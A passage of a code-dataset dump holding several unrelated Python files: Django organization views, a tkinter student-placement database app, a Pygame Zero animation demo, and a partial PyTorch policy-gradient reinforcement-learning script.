MembershipOrganization\n context_object_name = 'current_membership'\n slug_field_kwarg = 'pk'\n button = 'relationships'\n edit_url_name = 'edit-organization-membership'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['organization'] = Organization.objects.get(uuid=self.kwargs['organization_id'])\n\n parents = Q(compositionparent__value=context['organization'])\n children = Q(compositionchild__value=context['organization'])\n\n context['compositions'] = Composition.objects.filter(parents | children)\n context['memberships'] = MembershipOrganization.objects.filter(membershiporganizationmember__value=context['organization'])\n\n return context\n\n def get_form_kwargs(self):\n form_kwargs = super().get_form_kwargs()\n form_kwargs['organization_id'] = self.kwargs['organization_id']\n return form_kwargs\n\n\nclass OrganizationDeleteMembershipView(OrganizationDeleteRelationshipView):\n model = MembershipOrganization\n template_name = 'organization/delete-membership.html'\n\n def get_objects_to_update(self):\n membership = self.get_object()\n member = membership.member.get_value().value\n organization = membership.organization.get_value().value\n return member, organization\n\n def delete(self, request, *args, **kwargs):\n member, organization = self.get_objects_to_update()\n\n response = super().delete(request, *args, **kwargs)\n\n member.object_ref_saved()\n organization.object_ref_saved()\n\n return response\n\n # overriding the success and cancel urls since the model name is MembershipOrganization\n def get_success_url(self):\n organization_id = self.kwargs['organization_id']\n return reverse('create-organization-membership',\n kwargs={'organization_id': organization_id})\n\n def get_cancel_url(self):\n organization_id = self.kwargs['organization_id']\n pk = self.kwargs['pk']\n return reverse('edit-organization-membership',\n kwargs={'organization_id': organization_id,\n 'pk': pk})\n\n\nclass OrganizationEditPersonnelView(OrganizationEditView):\n model = MembershipPerson\n template_name = 'organization/edit-personnel.html'\n form_class = OrganizationPersonnelForm\n context_object_name = 'current_membership'\n slug_field_kwarg = 'organization_id'\n button = 'personnel'\n\n def get_form_kwargs(self):\n form_kwargs = super().get_form_kwargs()\n form_kwargs['organization_id'] = self.kwargs['organization_id']\n return form_kwargs\n\n\nclass OrganizationCreatePersonnelView(EditButtonsMixin, OrganizationCreateView):\n model = MembershipPerson\n template_name = 'organization/create-personnel.html'\n form_class = OrganizationCreatePersonnelForm\n context_object_name = 'current_membership'\n slug_field_kwarg = 'organization_id'\n button = 'personnel'\n edit_url_name = 'edit-organization-personnel'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['organization'] = Organization.objects.get(uuid=self.kwargs['organization_id'])\n return context\n\n def get_form_kwargs(self):\n form_kwargs = super().get_form_kwargs()\n form_kwargs['organization_id'] = self.kwargs['organization_id']\n return form_kwargs\n\n\nclass OrganizationDeletePersonnelView(OrganizationDeleteRelationshipView):\n model = MembershipPerson\n template_name = 'organization/delete-personnel.html'\n\n def get_objects_to_update(self):\n membership = self.get_object()\n person = membership.member.get_value().value\n organization = membership.organization.get_value().value\n return person, organization\n\n def delete(self, request, *args, **kwargs):\n person, organization = self.get_objects_to_update()\n\n response = super().delete(request, *args, **kwargs)\n\n person.object_ref_saved()\n organization.object_ref_saved()\n\n return response\n\n # overriding the success and cancel urls since the model name is MembershipPerson\n def get_success_url(self):\n organization_id = self.kwargs['organization_id']\n return reverse('create-organization-personnel',\n kwargs={'organization_id': organization_id})\n\n def get_cancel_url(self):\n organization_id = self.kwargs['organization_id']\n pk = self.kwargs['pk']\n return reverse('edit-organization-personnel',\n kwargs={'organization_id': organization_id,\n 'pk': pk})\n\n\nclass OrganizationEditEmplacementView(OrganizationEditView):\n model = Emplacement\n template_name = 'organization/edit-emplacement.html'\n form_class = OrganizationEmplacementForm\n context_object_name = 'current_emplacement'\n slug_field_kwarg = 'pk'\n button = 'location'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n context['emplacements'] = [e.emplacement for e in context['organization'].emplacements]\n context['associations'] = [e.association for e in context['organization'].associations]\n\n return context\n\n def get_form_kwargs(self):\n form_kwargs = super().get_form_kwargs()\n form_kwargs['organization_id'] = self.kwargs['organization_id']\n return form_kwargs\n\n\nclass OrganizationCreateEmplacementView(EditButtonsMixin, OrganizationCreateView):\n model = Emplacement\n template_name = 'organization/create-emplacement.html'\n form_class = OrganizationCreateEmplacementForm\n slug_field_kwarg = 'pk'\n button = 'location'\n edit_url_name = 'edit-organization-emplacement'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['organization'] = Organization.objects.get(uuid=self.kwargs['organization_id'])\n context['emplacements'] = [e.emplacement for e in context['organization'].emplacements]\n context['associations'] = [e.association for e in context['organization'].associations]\n\n return context\n\n def get_form_kwargs(self):\n form_kwargs = super().get_form_kwargs()\n form_kwargs['organization_id'] = self.kwargs['organization_id']\n return form_kwargs\n\n\nclass OrganizationDeleteEmplacementView(OrganizationDeleteRelationshipView):\n model = Emplacement\n template_name = 'organization/delete-emplacement.html'\n\n def get_objects_to_update(self):\n emplacement = self.get_object()\n organization = emplacement.organization.get_value().value\n site = emplacement.site.get_value().value\n return organization, site\n\n def delete(self, request, *args, **kwargs):\n organization, _ = self.get_objects_to_update()\n\n response = super().delete(request, *args, **kwargs)\n\n organization.object_ref_saved()\n\n return response\n\n\nclass OrganizationEditAssociationView(OrganizationEditView):\n model = Association\n template_name = 'organization/edit-association.html'\n form_class = OrganizationAssociationForm\n context_object_name = 'current_association'\n slug_field_kwarg = 'pk'\n button = 'location'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n context['emplacements'] = [e.emplacement for e in context['organization'].emplacements]\n context['associations'] = [e.association for e in context['organization'].associations]\n\n return context\n\n\nclass OrganizationCreateAssociationView(EditButtonsMixin, OrganizationCreateView):\n model = Association\n template_name = 'organization/create-association.html'\n form_class = OrganizationCreateAssociationForm\n slug_field_kwarg = 'pk'\n button = 'location'\n edit_url_name = 'edit-organization-association'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['organization'] = Organization.objects.get(uuid=self.kwargs['organization_id'])\n context['emplacements'] = [e.emplacement for e in context['organization'].emplacements]\n context['associations'] = [e.association for e in context['organization'].associations]\n\n return context\n\n\nclass OrganizationDeleteAssociationView(OrganizationDeleteRelationshipView):\n model = Association\n template_name = 'organization/delete-association.html'\n\n def get_objects_to_update(self):\n association = self.get_object()\n organization = association.organization.get_value().value\n area = association.area.get_value().value\n return organization, area\n\n def delete(self, request, *args, **kwargs):\n organization, _ = self.get_objects_to_update()\n\n response = super().delete(request, *args, **kwargs)\n\n organization.object_ref_saved()\n\n return response\n\n\ndef organization_autocomplete(request):\n term = request.GET.get('q')\n\n response = {\n 'results': []\n }\n\n if term:\n organizations = Organization.objects.filter(organizationname__value__icontains=term)[:10]\n\n for organization in organizations:\n result = {\n 'id': organization.id,\n 'text': organization.name.get_value().value,\n 'aliases': organization.alias_list,\n 'country': None,\n }\n\n if organization.division_id.get_value():\n result['country'] = country_name(organization.division_id.get_value().value)\n\n response['results'].append(result)\n\n return HttpResponse(json.dumps(response), content_type='application/json')\n\n\nclass OrganizationSitemap(Sitemap):\n\n protocol = 'http' if settings.DEBUG else 'https'\n\n def items(self):\n return Organization.objects.filter(published=True).order_by('id')\n\n def location(self, obj):\n return reverse('view-organization', args=[obj.uuid])\n","sub_path":"organization/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":25986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"139733966","text":"from tkinter import *\r\nfrom tkinter import ttk,messagebox\r\nfrom PIL import Image,ImageTk\r\nimport pymysql\r\nclass step1:\r\n def __init__(self,root):\r\n self.root=root\r\n self.root.title(\"Students Record Liabrary\")\r\n self.root.geometry(\"1550x800+0+0\")\r\n #self.bg=ImageTk.PhotoImage(file=\"images/logo.jpeg\")\r\n #self.bg_image=Label(self.frame1,image=self.bg).place(x=0,y=0)\r\n\r\n frame1 = Frame(self.root, bg=\"navy blue\")\r\n frame1.place(x=0, y=10, width=1550, height=130)\r\n\r\n frame1.Image = ImageTk.PhotoImage(file=\"images/logo.jpeg\")\r\n frame1.Image_pack = Label(self.root, image=frame1.Image).place(x=230, y=5, width=1000, height=140)\r\n\r\n frame2=Frame(self.root,bg=\"#10ac84\")\r\n frame2.place(x=0 ,y=150 , width=550 , height=700)\r\n\r\n #----------ALL VARIABLES=========\r\n self.text_Stu_Name_var=StringVar()\r\n self.text_Branch_var=StringVar()\r\n self.text_E_mail_var=StringVar()\r\n self.text_Contact_var=StringVar()\r\n self.cmb_Gender_var=StringVar()\r\n self.text_Company_var=StringVar()\r\n self.text_Package_var=StringVar()\r\n self.search_by=StringVar()\r\n self.search_text=StringVar()\r\n\r\n title = Label(frame2, text=\"Students Data\", font=(\"times new roman\", 30, \"bold\"), bg=\"navy blue\", fg=\"white\").place(x=0, y=10 ,width=550,height=40)\r\n\r\n\r\n Stu_Name = Label(frame2, text=\"Stu_Name\", font=(\"times new roman\", 25, \"bold\"), bg=\"#10ac84\", fg=\"white\").place(x=30, y=110)\r\n self.text_Stu_Name = Entry(frame2, font=(\"times new roman\", 20), bg=\"white\")\r\n self.text_Stu_Name.place(x=250, y=110, width=290 , height=30)\r\n Branch = Label(frame2, text=\"Branch\", font=(\"times new roman\", 25, \"bold\"), bg=\"#10ac84\", fg=\"white\").place(x=30, y=170)\r\n self.text_Branch = Entry(frame2, font=(\"times new roman\", 20), bg=\"white\")\r\n self.text_Branch.place(x=250 , y=170, width=290, height=30)\r\n E_mail = Label(frame2, text=\"E_mail\", font=(\"times new roman\", 25, \"bold\"), bg=\"#10ac84\", fg=\"white\").place(x=30, y=220)\r\n self.text_E_mail = Entry(frame2, font=(\"times new roman\", 20), bg=\"white\")\r\n self.text_E_mail.place(x=250, y=220, width=290, height=30)\r\n Contact = Label(frame2, text=\"Contact\", font=(\"times new roman\", 25, \"bold\"), bg=\"#10ac84\", fg=\"white\").place(x=30, y=280)\r\n self.text_Contact = Entry(frame2, font=(\"times new roman\", 20), bg=\"white\")\r\n self.text_Contact.place(x=250, y=280, width=290, height=30)\r\n '''Gender = Label(frame2, text=\"Gender\", font=(\"times new roman\", 25, \"bold\"), bg=\"#10ac84\", fg=\"white\").place(x=30, y=350)\r\n self.text_Gender = Entry(frame2, font=(\"times new roman\", 20), bg=\"white\")\r\n self.text_Gender.place(x=250, y=350, width=290, height=30)'''\r\n Gender = Label(frame2, text=\"Gender\", font=(\"times new roman\", 20, \"bold\"), bg=\"#10ac84\",fg=\"white\").place(x=30, y=350)\r\n self.cmb_Gender = ttk.Combobox(frame2, font=(\"times new roman\", 13), state='readonly', justify=CENTER)\r\n self.cmb_Gender['values'] = (\"Select\", \"Male\", \"Female\", \"Other\")\r\n self.cmb_Gender.place(x=250, y=350, width=250)\r\n self.cmb_Gender.current(0)\r\n #answer = Label(frame1, text=\"Answer\", font=(\"times new roman\", 20, \"bold\"), bg=\"white\", fg=\"gray\").place(x=30, y=240)\r\n #self.text_answer = Entry(frame1, font=(\"times new roman\", 15), bg=\"lightgray\")\r\n #self.text_answer.place(x=250, y=350, width=290,height=30)\r\n Company = Label(frame2, text=\"Company\", font=(\"times new roman\", 25, \"bold\"), bg=\"#10ac84\", fg=\"white\").place(x=30, y=410)\r\n self.text_Company = Entry(frame2, font=(\"times new roman\", 20), bg=\"white\")\r\n self.text_Company.place(x=250, y=410, width=290, height=30)\r\n Package = Label(frame2, text=\"Package\", font=(\"times new roman\", 25, \"bold\"), bg=\"#10ac84\", fg=\"white\").place(x=30, y=460)\r\n self.text_Package = Entry(frame2, font=(\"times new roman\", 20), bg=\"white\")\r\n self.text_Package.place(x=250, y=460, width=290, height=30)\r\n\r\n frame3 = Frame(self.root, bg=\"#1dd1a1\")\r\n frame3.place(x=550, y=150, width=1000, height=830)\r\n title = Label(frame3, text=\"Placed Students Record\", font=(\"times new roman\", 30, \"bold\"), bg=\"navy blue\",fg=\"white\").place(x=2, y=10, width=1000,height=40)\r\n\r\n btn_Add = Button(self.root, text=\"Add\",command=self.add_data, font=(\"times new roman\", 20),bd=2, cursor=\"hand2\",bg=\"#5f27cd\",fg=\"white\").place(x=50, y=670, width=80,height=40)\r\n btn_Update = Button(self.root, text=\"Update\",command=self.update_data, font=(\"times new roman\", 20),bd=2, cursor=\"hand2\",bg=\"#5f27cd\",fg=\"white\").place(x=160, y=670, width=100 , height=40)\r\n btn_Delete = Button(self.root, text=\"Delete\",command=self.delete_data, font=(\"times new roman\", 20),bd=2, cursor=\"hand2\",bg=\"#5f27cd\",fg=\"white\").place(x=300, y=670, width=100 , height=40)\r\n btn_Clear = Button(self.root, text=\"Clear\",command=self.clear, font=(\"times new roman\", 20),bd=2, cursor=\"hand2\",bg=\"#5f27cd\",fg=\"white\").place(x=430, y=670, width=100 , height=40)\r\n btn_Search = Button(self.root, text=\"Search\",command=self.search_data, font=(\"times new roman\", 20), bd=2, cursor=\"hand2\", bg=\"white\",fg=\"navy blue\").place(x=1080, y=210, width=120, height=30)\r\n btn_ShowAll = Button(self.root, text=\"Show All\",command=self.fetch_data, font=(\"times new roman\", 20), bd=2, cursor=\"hand2\", bg=\"white\",fg=\"navy blue\").place(x=1230, y=210, width=120, height=30)\r\n btn_HomePage = Button(self.root, text=\"Home Page\",command=self.HomePage_Window, font=(\"times new roman\", 20), bd=2,cursor=\"hand2\", bg=\"white\", fg=\"navy blue\").place(x=1380, y=210, width=140, height=30)\r\n btn_Company = Button(self.root, text=\"Company Details\", command=self.Company_Window, font=(\"times new roman\", 20), bd=2, cursor=\"hand2\", bg=\"light green\", fg=\"navy blue\").place(x=170, y=730, width=200, height=40)\r\n\r\n\r\n\r\n #Search = Label(frame3, text=\"Students Data\", font=(\"times new roman\", 30, \"bold\")).place(x=0, y=50, width=550, height=40)\r\n #title = Label(frame3, text=\"Search By\", font=(\"times new roman\", 20, \"bold\"),bg=\"#fd79a8\").place(x=20, y=55)\r\n\r\n search = Label(frame3, text=\"Search:-\", font=(\"times new roman\", 20, \"bold\"), bg=\"#1dd1a1\", fg=\"white\").place(x=20, y=55)\r\n self.cmb_search = ttk.Combobox(frame3,textvariable=self.search_by,text=\"Select Option\", font=(\"times new roman\", 13), state='readonly', justify=CENTER)\r\n self.cmb_search['values'] = (\"Select Options\", \"Stu_Name\")\r\n self.cmb_search.place(x=120, y=60,height=30)\r\n self.cmb_search.current(0)\r\n\r\n self.cmb_search = Entry(frame3,textvariable=self.search_text, font=(\"times new roman\", 15), bg=\"white\",bd=2)\r\n self.cmb_search.place(x=350, y=60, width=150, height=30)\r\n\r\n frame4=Frame(frame3,bd=4,relief=RIDGE,bg=\"Red\")\r\n frame4.place(x=40, y=110, width=900, height=520)\r\n\r\n\r\n\r\n scroll_x=Scrollbar(frame4,orient=HORIZONTAL)\r\n scroll_y = Scrollbar(frame4,orient=VERTICAL)\r\n\r\n self.student_table=ttk.Treeview(frame4,columns=(\"Stu_Name\",\"Branch\",\"E_mail\",\"Contact\",\"Gender\",\"Company\",\"Package\"),xscrollcommand=scroll_x.set,yscrollcommand=scroll_y.set)\r\n scroll_x.pack(side=BOTTOM,fill=X)\r\n scroll_y.pack(side=RIGHT,fill=Y)\r\n scroll_x.config(command=self.student_table.xview_scroll)\r\n scroll_y.config(command=self.student_table.yview_scroll)\r\n\r\n self.student_table.heading(\"Stu_Name\",text=\"Stu_Name\")\r\n self.student_table.heading(\"Branch\", text=\"Branch\")\r\n self.student_table.heading(\"E_mail\", text=\"E_mail\")\r\n self.student_table.heading(\"Contact\", text=\"Contact\")\r\n self.student_table.heading(\"Gender\", text=\"Gender\")\r\n self.student_table.heading(\"Company\", text=\"Company\")\r\n self.student_table.heading(\"Package\", text=\"Package\")\r\n self.student_table['show']='headings'\r\n self.student_table.column(\"Stu_Name\", width=170)\r\n self.student_table.column(\"Branch\", width=60)\r\n self.student_table.column(\"E_mail\", width=210)\r\n self.student_table.column(\"Contact\", width=80)\r\n self.student_table.column(\"Gender\",width=60)\r\n self.student_table.column(\"Company\", width=150)\r\n self.student_table.column(\"Package\", width=110)\r\n self.student_table.pack(fill=BOTH,expand=0.5)\r\n\r\n\r\n self.student_table.bind(\"\",self.get_cursor)\r\n self.fetch_data()\r\n\r\n\r\n\r\n def clear(self):\r\n self.text_Stu_Name.delete(0,END)\r\n self.text_Branch.delete(0, END)\r\n self.text_E_mail.delete(0, END)\r\n self.text_Contact.delete(0, END)\r\n self.text_Company.delete(0,END)\r\n self.text_Package.delete(0, END)\r\n self.cmb_Gender.current(0)\r\n #self.text_answer.delete(0, END)\r\n\r\n def add_data(self):\r\n if self.text_Stu_Name.get()==\"\" or self.text_Branch.get()==\"\" or self.text_E_mail.get()==\"\" or self.text_Company.get()==\"\" or self.cmb_Gender.get()==\"select\" or self.text_Package.get()==\"\":\r\n messagebox.showerror(\"Error\",\"All Fields Are Required\",parent=self.root)\r\n else:\r\n\r\n try:\r\n con=pymysql.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"student\")\r\n cur=con.cursor()\r\n cur.execute(\"INSERT INTO data values(%s,%s,%s,%s,%s,%s,%s)\",\r\n (self.text_Stu_Name.get(),\r\n self.text_Branch.get(),\r\n self.text_E_mail.get(),\r\n self.text_Contact.get(),\r\n self.cmb_Gender.get(),\r\n self.text_Company.get(),\r\n self.text_Package.get()\r\n ))\r\n\r\n con.commit()\r\n self.fetch_data()\r\n self.clear()\r\n messagebox.showinfo(\"Added\", \"Data Added Successfully\", parent=self.root)\r\n con.close()\r\n\r\n except Exception as es:\r\n messagebox.showerror(\"Error\",f\"Error due to: {str(es)}\",parent=self.root)\r\n\r\n\r\n\r\n def fetch_data(self):\r\n con = pymysql.connect(host=\"localhost\", user=\"root\", password=\"\", database=\"student\")\r\n cur = con.cursor()\r\n cur.execute(\"select * from data\")\r\n rows=cur.fetchall()\r\n if len(rows)!=0:\r\n self.student_table.delete(*self.student_table.get_children())\r\n for row in rows:\r\n self.student_table.insert('',END,values=row)\r\n con.commit()\r\n con.close()\r\n\r\n\r\n def get_cursor(self,ev):\r\n curosor_row=self.student_table.focus()\r\n contents=self.student_table.item(curosor_row)\r\n row=contents['values']\r\n print(row)\r\n self.text_Stu_Name.delete(\"1\",END)\r\n self.text_Stu_Name.insert(END,row[0])\r\n self.text_Branch.delete(\"2\",END)\r\n self.text_Branch.insert(END,row[1])\r\n self.text_E_mail.delete(\"3\",END)\r\n self.text_E_mail.insert(END,row[2])\r\n self.text_Contact.delete(\"4\",END)\r\n self.text_Contact.insert(END,row[3])\r\n self.cmb_Gender.delete(\"5\",END)\r\n self.cmb_Gender.insert(END,row[4])\r\n self.text_Company.delete(\"6\",END)\r\n self.text_Company.insert(END,row[5])\r\n self.text_Package.delete(\"7\",END)\r\n self.text_Package.insert(END,row[6])\r\n\r\n '''con = pymysql.connect(host=\"localhost\", user=\"root\", password=\"\", database=\"student\")\r\n cur = con.cursor()\r\n cur.execute(\"select * from data where E_mail=%s\")\r\n rows = cur.fetchall()\r\n if len(rows) != 0:\r\n self.student_table.delete(*self.student_table.get_children())\r\n for row in rows:\r\n self.student_table.insert('', END, values=row)\r\n con.commit()\r\n con.close()'''\r\n\r\n def update_data(self):\r\n con = pymysql.connect(host=\"localhost\", user=\"root\", password=\"\", database=\"student\")\r\n cur = con.cursor()\r\n cur.execute(\"UPDATE data SET Stu_Name=%s,Branch=%s,Contact=%s,Gender=%s,Company=%s,Package=%s where E_mail=%s\",\r\n (self.text_Stu_Name.get(),\r\n self.text_Branch.get(),\r\n self.text_Contact.get(),\r\n self.cmb_Gender.get(),\r\n self.text_Company.get(),\r\n self.text_Package.get(),\r\n self.text_E_mail.get()\r\n ))\r\n\r\n con.commit()\r\n self.fetch_data()\r\n self.clear()\r\n messagebox.showinfo(\"Added\", \"Data Added Successfully\", parent=self.root)\r\n con.close()\r\n\r\n def delete_data(self):\r\n con = pymysql.connect(host=\"localhost\", user=\"root\", password=\"\", database=\"student\")\r\n cur = con.cursor()\r\n cur.execute(\"delete from data where E_mail=%s\",self.text_E_mail.get())\r\n\r\n con.commit()\r\n con.close()\r\n self.fetch_data()\r\n self.clear()\r\n\r\n def search_data(self):\r\n con = pymysql.connect(host=\"localhost\", user=\"root\", password=\"\", database=\"student\")\r\n cur = con.cursor()\r\n\r\n cur.execute(\"select * from data where Stu_Name=%s\",(str(self.search_text.get())))\r\n rows=cur.fetchall()\r\n if len(rows) != 0:\r\n self.student_table.delete(*self.student_table.get_children())\r\n for row in rows:\r\n self.student_table.insert('', END, values=row)\r\n\r\n con.commit()\r\n con.close()\r\n\r\n def HomePage_Window(self):\r\n self.root.destroy()\r\n import FrontPage\r\n\r\n def Company_Window(self):\r\n self.root.destroy()\r\n import ComReg\r\n\r\n\r\n\r\nroot = Tk()\r\nobj=step1(root)\r\nroot.mainloop()\r\n","sub_path":"StuDetails.py","file_name":"StuDetails.py","file_ext":"py","file_size_in_byte":13799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"336909004","text":"import pgzrun # 导入游戏库\nWIDTH = 1200 # 设置窗口的宽度\nHEIGHT = 600 # 设置窗口的高度\n\n# 导入所有的分解动作图片,��在列表当中\nAnims = [Actor('1'), Actor('2'), Actor('3'),\n Actor('4'), Actor('5')]\nnumAnims = len(Anims) # 分解动作图片的张数\nanimIndex = 0 # 表示需要显示的动作图片的序号\nanimSpeed = 0 # 用于控制行走动画速度\n\nplayer_x = WIDTH/2 # 设置玩家的x坐标\nplayer_y = HEIGHT/2 # 设置玩家的y坐标\nfor i in range(numAnims):\n Anims[i].x = player_x # 设置所有分解动作图片的x坐标\n Anims[i].y = player_y # 设置所有分解动作图片的y坐标\n\ndef draw(): # 绘制模块,每帧重复执\n screen.fill('gray') # 灰色背景\n Anims[animIndex].draw() # 绘制玩家当前分解动作图片\n\ndef update(): # 更新模块,每帧重复操作\n global animIndex, player_x, animSpeed\n if keyboard.right: # 如果按下键盘右键\n player_x += 5 # 角色向右移动\n for i in range(numAnims): # 所有分解动作图片更新x坐标\n Anims[i].x = player_x\n if (player_x >= WIDTH): # 角色走到最右边\n player_x = 0 # 再从最左边出现\n animSpeed += 1 # 用于控制动作动画速度\n if animSpeed % 5 == 0: # 动作动画速度是移动速度的1/5\n animIndex += 1 # 每一帧分解动作图片序号加1\n if animIndex >= numAnims: # 放完最后一个分解动作图片了\n animIndex = 0 # 再变成第一张分解动作图片 \n\npgzrun.go() # 开始执行游戏","sub_path":"PygameZero/python游戏趣味编程代码/第8章/8-8-3.py","file_name":"8-8-3.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"648677335","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport gym\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\nimport time, pprint\nimport matplotlib.pyplot as plt\n\n\n# add observation with timestep t\n# policy gradient must have positive rewards\n\nclass PolicyNet(nn.Module):\n def __init__(self, num_observations, num_actions):\n super().__init__()\n self.num_observations = num_observations\n self.fc1 = nn.Linear(num_observations, 64)\n self.fc2 = nn.Linear(64, num_actions)\n\n def forward(self, x):\n batch_size, num_input = x.size()\n assert num_input == self.num_observations, 'invalid num_input'\n x = F.relu(self.fc1(x))\n x = F.softmax(self.fc2(x), dim = 1)\n return x\n\nclass ValueNet(nn.Module):\n def __init__(self, num_observations):\n super().__init__()\n self.num_observations = num_observations\n self.fc1 = nn.Linear(num_observations, 64)\n self.fc2 = nn.Linear(64, 1)\n\n def forward(self, x):\n batch_size, num_input = x.size()\n assert num_input == self.num_observations, 'invalid num_input'\n x = F.relu(self.fc1(x))\n x = self.fc2(x)\n return x\n\nclass Buffer(object):\n def __getitem__(self, key):\n return self.buffer.__getitem__(key)\n\n def __iter__(self):\n yield from self.buffer\n\nclass TrajectoryBuffer(Buffer):\n def __init__(self, buffer_size, gamma):\n self.buffer_size = buffer_size\n self.gamma = gamma\n self.reset()\n\n def store(self, *transition):\n self.transition_buffer.store(*transition)\n buffer_full = False\n done = transition[-1]\n if done:\n self.buffer.append(self.transition_buffer)\n self.transition_buffer = TransitionBuffer(self.gamma)\n if len(self.buffer) == self.buffer_size: buffer_full = True\n return buffer_full\n\n def reset(self):\n self.transition_buffer = TransitionBuffer(self.gamma)\n self.buffer = []\n\nclass TransitionBuffer(Buffer):\n def __init__(self, gamma):\n self.gamma = gamma\n self.buffer = None\n\n def store(self, observation, action, next_observation, reward, done):\n # transition: observation, next_observation, action, reward, future_rewards\n transition = np.concatenate((observation, next_observation, np.array([action, reward, 0]))).astype(np.float32)[np.newaxis, :]\n if self.buffer is None:\n self.buffer = transition\n else:\n self.buffer = np.concatenate((self.buffer, transition), axis = 0)\n # update the future rewards\n self.buffer[:, -1] += (self.gamma ** (np.arange(len(self.buffer), 0, -1)-1) * reward)\n if done: self.total_rewards = self.buffer.sum(axis = 0)[-2]\n\nclass Agent(object):\n def __init__(self, observation_space, action_space):\n # hyper parameters\n self.lr = 0.01\n self.gamma = 0.97\n self.batch_size = 1 #8\n self.reward_bias = 0\n # 'vanilla', 'future_rewards', 'actor_critic_mc', 'actor_critic_td'\n self.policy_gradient_method = 'actor_critic_mc'\n self.add_timestep_to_observation = True\n\n self.need_value_net = self.policy_gradient_method in ['actor_critic_mc', 'actor_critic_td']\n self.action_space = action_space\n self.actions = list(range(action_space.n))\n self.num_observations = np.prod(observation_space.shape)\n\t\t\n if self.add_timestep_to_observation: self.num_observations += 1\n self.policy_net = PolicyNet(self.num_observations, action_space.n)\n self.optimizer_policy = optim.Adam(self.policy_net.parameters(), lr = self.lr)\n\n if self.need_value_net:\n self.value_net = ValueNet(self.num_observations)\n self.optimizer_value = optim.Adam(self.value_net.parameters(), lr = self.lr)\n self.criterion = nn.MSELoss()\n self.batch_size = 1 # the batch size should be smaller when use actor critic\n self.trajectory_buffer = TrajectoryBuffer(self.batch_size, self.gamma)\n\n self.num_learns = 0\n self.debug_rewards = []\n\n def new_episode(self):\n self.loss_history = []\n self.loss_history_value = []\n\n def memorize(self, *transition):\n # observation, action, next_observation, reward, done\n buffer_full = self.trajectory_buffer.store(*transition)\n if buffer_full:\n self.learn()\n self.trajectory_buffer.reset()\n\n def choose_action(self, observation, optimal = False):\n actions_prob = self.policy_net(torch.tensor(observation[np.newaxis, :]).float())\n if optimal:\n action = self.actions[torch.argmax(actions_prob).item()]\n else:\n n = np.random.rand()\n for i, action in enumerate(self.actions):\n if n < actions_prob[0,i].item(): break\n n -= actions_prob[0,i].item()\n return action\n\n def learn(self):\n if self.num_learns == 0: print('start to learn...')\n loss = 0\n loss_value = 0\n for trajectory in self.trajectory_buffer:\n # transition: observation, next_observation, action, reward, future_rewards\n batch_observations, batch_next_observations, batch_actions, batch_rewards, batch_future_rewards = \\\n map(torch.tensor, [trajectory[:, 0:self.num_observations], trajectory[:, self.num_observations:2*self.num_observations], trajectory[:, -3], trajectory[:, -2], trajectory[:, -1]])\n batch_actions, batch_rewards, batch_future_rewards = map(lambda x: x.view(-1, 1), [batch_actions, batch_rewards, batch_future_rewards])\n\n # 'vanilla', 'future_rewards', 'actor_critic_mc', 'actor_critic_td'\n if self.policy_gradient_method == 'vanilla':\n # loss function\n # L(theta) = -sum( reward(trajectory) - b ) * log(P(a(t)|s(t);theta)) )\n rewards = trajectory.total_rewards - self.reward_bias\n elif self.policy_gradient_method == 'future_rewards':\n # L(theta) = -sum( ( sum(future_rewards(t)) - b ) * log(P(a(t)|s(t);theta)) )\n rewards = batch_future_rewards - self.reward_bias\n elif self.policy_gradient_method == 'actor_critic_mc':\n # Monte carlo based actor critic\n # L(theta) = -sum( ( sum(future_rewards(t)) - V_pi(s(t)) ) * log(P(a(t)|s(t);theta)) )\n state_value = self.value_net(batch_observations)\n rewards = batch_future_rewards - state_value.detach()\n # loss function of value net\n # L = MSE(sum(future_rewards(t)) - V_pi(s(t)))\n loss_value += self.criterion(batch_future_rewards, state_value)\n elif self.policy_gradient_method == 'actor_critic_td':\n # Temporal Difference based actor critic\n # L(theta) = -sum( ( r(t) + V_pi(s(t+1)) - V_pi(s(t)) ) * log(P(a(t)|s(t);theta)) )\n state_value = self.value_net(batch_observations)\n next_state_value = self.value_net(batch_next_observations)\n # if done: next_state_value will be 0????????????\n rewards = batch_rewards + self.gamma * next_state_value.detach() - state_value.detach()\n # loss function of value net\n # L = MSE( r(t) + V_pi(s(t+1)) - V_pi(s(t)) )\n loss_value += self.criterion(batch_rewards + next_state_value, state_value)\n self.debug_rewards.append(rewards)\n\n prob = self.policy_net(batch_observations).gather(1, batch_actions.long())\n log_prob = torch.log(prob)\n loss += -torch.sum(rewards * log_prob)\n if self.need_value_net:\n self.loss_history_value.append(loss_value.item())\n self.optimizer_value.zero_grad()\n loss_value.backward()\n self.optimizer_value.step()\n self.loss_history.append(loss.item())\n self.optimizer_policy.zero_grad()\n loss.backward()\n self.optimizer_policy.step()\n self.num_learns += 1\n\n def save(self, filename = 'policy_net.txt'):\n torch.save(self.policy_net.state_dict(), filename)\n\n def load(self, filename = 'policy_net.txt'):\n self.policy_net.load_state_dict(torch.load(filename))\n\nclass Game(object):\n def __init__(self, game_name):\n self.env = gym.make(game_name)\n #self.env.seed(1)\n print('action space:', self.env.action_space)\n print('observation space:', self.env.observation_space)\n self.agent = Agent(self.env.observation_space, self.env.action_space)\n self.reward_shaping = getattr(self, 'reward_shaping_{}'.format(game_name.split('-')[0]))\n self.resolved = getattr(self, 'resolved_{}'.format(game_name.split('-')[0]))\n\n def reward_shaping_CartPole(self, observation, next_observation, reward):\n x, x_dot, theta, theta_dot = next_observation\n r1 = (self.env.unwrapped.x_threshold - abs(x))/self.env.unwrapped.x_threshold - 0.8\n r2 = (self.env.unwrapped.theta_threshold_radians - abs(theta))/self.env.unwrapped.theta_threshold_radians - 0.5\n reward = r1 